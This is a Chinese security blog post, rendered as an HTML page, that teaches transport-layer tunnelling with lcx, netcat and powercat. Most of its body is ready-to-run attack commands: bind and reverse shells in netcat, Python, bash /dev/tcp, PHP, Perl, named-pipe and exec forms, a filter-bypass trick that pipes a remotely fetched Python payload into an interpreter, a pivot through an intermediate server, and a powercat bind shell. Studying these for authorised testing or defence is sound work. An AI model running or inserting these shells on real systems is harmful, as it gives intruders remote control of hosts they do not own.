<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"sunian19.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="lcx端口转发 链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1nJGr6uWFvZw_6aK8OMACrw 提取码：zcsr">
<meta property="og:type" content="article">
<meta property="og:title" content="&#39;传输层隧道技术&#39;">
<meta property="og:url" content="https://sunian19.github.io/2020/03/25/%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/index.html">
<meta property="og:site_name" content="zer0_c|imb&#39;s blog">
<meta property="og:description" content="lcx端口转发 链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1nJGr6uWFvZw_6aK8OMACrw 提取码：zcsr">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sunian19.github.io/imgss/u86.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u87.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u88.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u89.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u90.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u91.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a25.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u94.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u95.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/u96.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p22.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p23.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p24.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p25.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p26.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/i27.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/i25.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a37.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a38.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/a39.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p27.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p28.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p29.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p30.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p31.png">
<meta property="og:image" content="https://sunian19.github.io/imgss/p32.png">
<meta property="article:published_time" content="2020-03-25T06:25:04.000Z">
<meta property="article:modified_time" content="2022-09-29T02:56:35.000Z">
<meta property="article:author" content="zer0_c|imb">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="工具">
<meta property="article:tag" content="协议">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://sunian19.github.io/imgss/u86.png">


<link rel="canonical" href="https://sunian19.github.io/2020/03/25/%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://sunian19.github.io/2020/03/25/%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/","path":"2020/03/25/传输层隧道技术/","title":"'传输层隧道技术'"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>'传输层隧道技术' | zer0_c|imb's blog</title>
  

  <script src="/js/third-party/analytics/baidu-analytics.js"></script>
  <script async src="https://hm.baidu.com/hm.js?48584c486973b4bf025a425c3d7b4007"></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">zer0_c|imb's blog</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#lcx-duan-kou-zhuan-fa"><span class="nav-number">1.</span> <span class="nav-text">lcx端口转发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#netcat"><span class="nav-number">2.</span> <span class="nav-text">netcat</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-an-zhuang"><span class="nav-number">2.1.</span> <span class="nav-text">1、安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-bang-zhu-xin-xi-su-cha-biao"><span class="nav-number">2.2.</span> <span class="nav-text">2、帮助信息速查表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-shi-yong"><span class="nav-number">2.3.</span> <span class="nav-text">3、使用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-huo-qu-shell"><span class="nav-number">2.4.</span> <span class="nav-text">4、获取shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-mu-biao-ji-wu-nc-shi-huo-qu-fan-xiang-shell"><span class="nav-number">2.5.</span> <span class="nav-text">5、目标机无nc时获取反向shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#powercat-xiang-dang-yu-powershell-ban-nc"><span class="nav-number">3.</span> <span class="nav-text">powercat(相当于powershell版nc)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-an-zhuang-1"><span class="nav-number">3.1.</span> <span class="nav-text">1、安装</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-tong-guo-nc-zheng-xiang-lian-jie-powercat"><span class="nav-number">3.2.</span> <span class="nav-text">2、通过nc正向连接powercat</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-tong-guo-nc-fan-xiang-lian-jie-powercat"><span class="nav-number">3.3.</span> <span class="nav-text">3、通过nc反向连接powercat</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-tong-guo-powercat-fan-hui-powershell"><span class="nav-number">3.4.</span> <span class="nav-text">4、通过powercat返回powershell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-tong-guo-powercat-chuan-shu-wen-jian"><span class="nav-number">3.5.</span> <span class="nav-text">5、通过powercat传输文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-yong-powercat-sheng-cheng-payload"><span class="nav-number">3.6.</span> <span class="nav-text">6、用powercat生成payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#7-powercat-dns-tong-xin"><span class="nav-number">3.7.</span> <span class="nav-text">7、powercat DNS通信</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#8-jiang-powercat-zuo-wei-tiao-ban"><span class="nav-number">3.8.</span> <span class="nav-text">8、将powercat作为跳板</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zer0_c|imb"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">zer0_c|imb</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">89</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">39</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="qq fa-fw"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll site-overview-item animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/lyshark" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;lyshark" rel="noopener" target="_blank">lyshark</a>
        </li>
    </ul>
  </div>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sunian19.github.io/2020/03/25/%E4%BC%A0%E8%BE%93%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/imgss/touxiang.jpg">
      <meta itemprop="name" content="zer0_c|imb">
      <meta itemprop="description" content="忘川河畔彼岸花，红如鲜血似朱砂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zer0_c|imb's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          '传输层隧道技术'
        </h1>


        <div class="post-meta">
        
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-03-25 14:25:04" itemprop="dateCreated datePublished" datetime="2020-03-25T14:25:04+08:00">2020-03-25</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-09-29 10:56:35" itemprop="dateModified" datetime="2022-09-29T10:56:35+08:00">2022-09-29</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>

      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="lcx-duan-kou-zhuan-fa" id="lcx端口转发">lcx端口转发</h2>
<p>链接：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1nJGr6uWFvZw_6aK8OMACrw">https://pan.baidu.com/s/1nJGr6uWFvZw_6aK8OMACrw</a><br>
提取码：zcsr</p>
<a id="more"></a>
<p>直接可以使用，如无法使用自行编译</p>
<p>将本机4444端口监听的所有数据发送到本机5555端口<br>
./lcx -listen 4444 5555<br>
将目标机内网端口转发到公网<br>
./lcx -slave 192.168.1.137 4444 127.0.0.1 3389<br>
(先监听再进行通信)</p>
<p>端口映射：<br>
由于目标防火墙限制，我们可以将目标服务器相应端口的数据传到其他允许防火墙通过的端口(如53)<br>
./lcx -tran 53 192.168.1.1 22<br>
<img src="/imgss/u86.png" alt=""></p>
<h2 id="netcat" id="netcat">netcat</h2>
<h3 id="1-an-zhuang" id="1、安装">1、安装</h3>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wget http:&#x2F;&#x2F;sourceforge.net&#x2F;projects&#x2F;netcat&#x2F;files&#x2F;netcat&#x2F;0.7.1&#x2F;netcat-0.7.1.tar.gz&#x2F;download -O netcat-0.7.1.tar.gz</span><br><span class="line">tar zxvf netcat-0.7.1.tar.gz</span><br><span class="line">cd netcat-0.7.1</span><br><span class="line">.&#x2F;configure</span><br><span class="line">make</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/u87.png" alt=""></p>
<p>windows版本的nc。在禁用-e远程执行选项的情况下编译的版本。<br>
<a target="_blank" rel="noopener" href="https://joncraton.org/files/nc111nt.zip">https://joncraton.org/files/nc111nt.zip</a><br>
<a target="_blank" rel="noopener" href="https://joncraton.org/files/nc111nt_safe.zip">https://joncraton.org/files/nc111nt_safe.zip</a></p>
<h3 id="2-bang-zhu-xin-xi-su-cha-biao" id="2、帮助信息速查表">2、帮助信息速查表</h3>
<p>nc -h 查看帮助信息<br>
-d: 后台模式<br>
-e: 程序重定向<br>
-g&lt;网关&gt;: 设置路由器跃程通信网关，最多可设置8个。<br>
-G&lt;指向器数目&gt;: 设置源路由指向器的数量，值为4的倍数。<br>
-i&lt;延迟秒数&gt;: 设置时间间隔，以便传送信息及扫描通信端口<br>
-l: 使用监听模式，管理和控制传入的数据<br>
-n: 直接使用IP地址(不通过域名服务器)<br>
-o&lt;输出文件&gt;: 指定文件名称，把往来传输的数据转换为16进制字符后保存在该文件中<br>
-p&lt;通信端口&gt;: 设置本机使用的通信端口<br>
-r: 随机指定本机与远程主机的通信端口<br>
-s&lt;源地址&gt;: 设置本机送出数据包的IP地址<br>
-u: 使用UDP传输协议<br>
-v: 详细输出<br>
-w&lt;超时秒数&gt;:设置等待连线的时间<br>
-z: 将输入/输出功能关闭，只在扫描通信端口时使用</p>
<h3 id="3-shi-yong" id="3、使用">3、使用</h3>
<p>(1) banner相关信息抓取<br>
nc -nv 192.168.123.103 22<br>
<img src="/imgss/u88.png" alt=""></p>
<p>(2) 连接远程主机<br>
nc -nvv 192.168.123.103 80<br>
<img src="/imgss/u89.png" alt=""></p>
<p>(3) 端口扫描<br>
扫描指定端口<br>
nc -v 192.168.123.103 80<br>
扫描端口段(速度很慢)<br>
nc -v -z 192.168.123.103 20-1024<br>
<img src="/imgss/u90.png" alt=""></p>
<p>(4)监听端口<br>
监听本地端口，当访问该端口时会输出该信息到命令行<br>
nc -lp 999<br>
<img src="/imgss/u91.png" alt=""></p>
<p>(5)文件传输<br>
传输一个名为test.txt的文本文件<br>
nc -vn 192.168.1.1 333 &lt; test.txt -q 1</p>
<p>监听，将接受到的数据放到1.txt<br>
nc -lp 333 &gt; 1.txt<br>
传输完成后，打开1.txt，可看到数据已经传输过来<br>
<img src="/imgss/a25.png" alt=""></p>
<p>(6)简易聊天<br>
nc -l -p 888<br>
nc -vn 192.168.1.1 888<br>
<img src="/imgss/u94.png" alt=""></p>
<h3 id="4-huo-qu-shell" id="4、获取shell">4、获取shell</h3>
<p>(1)正向shell<br>
客户端连接服务器，客户端获取服务器的shell。(目标机监听，攻击机连接)<br>
目标机命令：<br>
nc -lvp 4444 -e /bin/sh                       在linux中使用<br>
nc -lvp 4444 -e c:\windows\system32\cmd.exe   在win中使用</p>
<p>攻击机命令：<br>
nc 192.168.1.1 4444<br>
<img src="/imgss/u95.png" alt=""><br>
可以看到我们执行ifconfig,变成了目标机的IP,即拿到了目标机的shell</p>
<p>(2)反向shell<br>
客户端连接服务器，服务器获取客户端的shell。通常用在开启防护措施的目标机，如防火墙过滤、端口转发的等。<br>
(攻击机监听，目标机连接)<br>
攻击机命令：<br>
nc -lvp 999</p>
<p>目标机：<br>
nc 192.168.1.1 999 -e /bin/sh  在linux中使用<br>
nc 192.168.1.1 999 -e c:\windows\system32\cmd.exe  在win中使用<br>
<img src="/imgss/u96.png" alt=""></p>
<h3 id="5-mu-biao-ji-wu-nc-shi-huo-qu-fan-xiang-shell" id="5、目标机无nc时获取反向shell">5、目标机无nc时获取反向shell</h3>
<p>(1)python反向shell</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvp 2222</span><br><span class="line"></span><br><span class="line">目标机：</span><br><span class="line">python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.136.129&quot;,2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-i&quot;]);&#39;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/p22.png" alt=""><br>
(2)bash反向shell</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvp 4444</span><br><span class="line"></span><br><span class="line">目标机：</span><br><span class="line">bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.136.129&#x2F;4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/p23.png" alt=""></p>
<p>(3)PHP反向shell</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvp 3333</span><br><span class="line"></span><br><span class="line">目标机：</span><br><span class="line">php -r &#39;$sock&#x3D;fsockopen(&quot;192.168.136.129&quot;,3333);exec(&quot;&#x2F;bin&#x2F;sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/p24.png" alt=""><br>
(4)perl反向shell</p>
<p>攻击机：<br>
nc -lvp 5555</p>
<p>目标机：</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e &#39;use Socket;$i&#x3D;&quot;192.168.136.129&quot;;$p&#x3D;5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;&#x2F;bin&#x2F;sh -i&quot;);&#125;;&#39;</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/p25.png" alt=""></p>
<p>(5)内网代理<br>
环境：kali无法访问数据库服务器，但是可以通过web服务器访问数据库服务器<br>
<img src="/imgss/p26.png" alt="拓扑环境"><br>
kali执行:<br>
nc -lvp 3333<br>
数据库执行:<br>
nc -lvp 3333 -e /bin/sh<br>
web服务器执行：<br>
nc -v 192.168.1.4 3333 -c “nc -v 1.1.1.200 3333”</p>
<p>原理：把web服务器当作中间机，使kali与数据库通信</p>
<p>(6)技巧之’/‘符号绕过(文件传输与python反向shell结合)(来自&quot;熊猫人&quot;的思路)<br>
反弹shell大全http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet<br>
前提:靶机可以执行nc和pyhon<br>
要想反弹shell成功，很大程度上需要’/‘符号，但是有些网站，bp发过去的’/'不起作用。</p>
<p>利用nc的传输文件:<br>
nc -lnvp 5555 &lt; cmd<br>
nc localhost 5555 可查看cmd文件内容<br>
cmd的内容如下</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">import socket,subprocess,os</span><br><span class="line">s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM)</span><br><span class="line">s.connect((&quot;192.168.136.141&quot;,1234))</span><br><span class="line">os.dup2(s.fileno(),0)</span><br><span class="line">os.dup2(s.fileno(),1)</span><br><span class="line">os.dup2(s.fileno(),2)</span><br><span class="line">p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-i&quot;])</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/i27.png" alt=""></p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击机执行：</span><br><span class="line">nc -lnvp 10000 &lt; cmd 如果shell反弹不回去，关掉这部分</span><br><span class="line">nc -lnvp 1234</span><br><span class="line">目标机执行：</span><br><span class="line">nc 192.168.136.129 10000 | python</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/i25.png" alt=""></p>
<p>(7)对于不支持nc -e参数，使用以下命令或使用其他版本nc</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">攻击机：</span><br><span class="line">nc -lvp 1024</span><br><span class="line">目标机：</span><br><span class="line">nc.traditional 192.168.37.132 1024 -e &#x2F;bin&#x2F;sh</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/a37.png" alt=""></p>
<p>(8)配合命名管道进行反弹</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rm &#x2F;tmp&#x2F;f;mkfifo &#x2F;tmp&#x2F;f;cat &#x2F;tmp&#x2F;f|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1 | nc 192.168.37.132 1024 &gt;&#x2F;tmp&#x2F;f</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/a38.png" alt=""></p>
<p>(9)使用exec反弹</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0&lt;&amp;196;exec 196&lt;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.37.132&#x2F;1024; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</span><br></pre></td></tr></table></figure></div>
<p><img src="/imgss/a39.png" alt=""></p>
<h2 id="powercat-xiang-dang-yu-powershell-ban-nc" id="powercat-相当于powershell版nc">powercat(相当于powershell版nc)</h2>
<h3 id="1-an-zhuang-1" id="1、安装-2">1、安装</h3>
<p>git clone <a target="_blank" rel="noopener" href="https://github.com/besimorhino/powercat.git">https://github.com/besimorhino/powercat.git</a><br>
下载后，导入模块，可能会出现异常<br>
Import-Module .\powercat.ps1<br>
权限不足导致，直接使用命令修改权限<br>
Set-ExecutionPolicy RemoteSigned<br>
再次执行Import-Module .\powercat.ps1<br>
输入powercat -h 可查看帮助信息即安装完成<br>
<img src="/imgss/p27.png" alt=""></p>
<h3 id="2-tong-guo-nc-zheng-xiang-lian-jie-powercat" id="2、通过nc正向连接powercat">2、通过nc正向连接powercat</h3>
<p>目标机执行：<br>
powercat -l -p 8080 -e cmd.exe -v</p>
<p>攻击机执行：<br>
nc 192.168.136.133 8080 -vv<br>
<img src="/imgss/p28.png" alt=""></p>
<p>命令：<br>
-l：监听模式<br>
-p：指定端口<br>
-e：指定启动进程的名称<br>
-v：显示详情</p>
